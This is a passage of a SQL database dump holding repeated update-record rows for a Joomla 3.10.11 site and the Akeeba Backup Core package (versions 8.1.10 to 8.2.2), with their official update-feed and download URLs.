package','','pkg_akeeba','package','',0,'8.1.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-10.html',''),(33650,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33651,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33652,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33653,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33654,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-10.html',''),(33655,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33656,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33657,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33658,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33659,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-10.html',''),(33660,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33661,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33662,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33663,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-10.html',''),(33664,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33665,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33666,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33667,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33668,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33669,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-10.html',''),(33670,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33671,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33672,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33673,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33674,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-10.html',''),(33675,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33676,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33677,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33678,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33679,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-10.html',''),(33680,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33681,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33682,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33683,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-10.html',''),(33684,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33685,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33686,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33687,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33688,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-0.html',''),(33689,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33690,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33691,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33692,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33693,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33694,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-0.html',''),(33695,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33696,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33697,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33698,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-0.html',''),(33699,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33700,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33701,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33702,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33703,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33704,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-0.html',''),(33705,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33706,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33707,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33708,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-0.html',''),(33709,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33710,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33711,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33712,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33713,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-0.html',''),(33714,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33715,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33716,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33717,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-0.html',''),(33718,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33719,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33720,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33721,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-0.html',''),(33722,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33723,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33724,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33725,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-0.html',''),(33726,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33727,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33728,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33729,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-0.html',''),(33730,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33731,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33732,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33733,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33734,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-0.html',''),(33735,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33736,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33737,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33738,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-1.html',''),(33739,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33740,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33741,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33742,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33743,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-1.html',''),(33744,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33745,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33746,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33747,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-1.html',''),(33748,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33749,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33750,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33751,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33752,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-1.html',''),(33753,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33754,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33755,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33756,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33757,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-1.html',''),(33758,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33759,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33760,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33761,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-1.html',''),(33762,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33763,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33764,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33765,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33766,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33767,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-1.html',''),(33768,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33769,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33770,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-1.html',''),(33771,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33772,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33773,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33774,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33775,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33776,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33777,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33778,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33779,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-1.html',''),(33780,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33781,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33782,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33783,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-1.html',''),(33784,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33785,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33786,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33787,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(33788,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33789,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33790,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33791,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33792,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33793,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(33794,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33795,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33796,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(33797,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33798,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33799,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33800,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33801,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33802,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(33803,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33804,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33805,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33806,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(33807,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33808,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33809,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33810,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(33811,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33812,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33813,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33814,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33815,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(33816,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33817,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33818,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33819,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33820,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(33821,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33822,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33823,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33824,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(33825,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33826,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33827,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33828,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33829,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(33830,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33831,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33832,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33833,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33834,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33835,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33836,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(33837,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33838,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33839,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33840,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(33841,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33842,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33843,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33844,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(33845,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33846,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33847,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33848,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33849,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33850,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(33851,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33852,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33853,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33854,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(33855,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33856,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(33857,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33858,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33859,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33860,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33861,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(33862,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33863,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(33864,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33865,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33866,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33867,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33868,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(33869,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33870,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33871,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33872,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(33873,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33874,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33875,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33876,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33877,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33878,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-2.html',''),(33879,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33880,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33881,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(33882,67,0,'Akeeba Backup Core 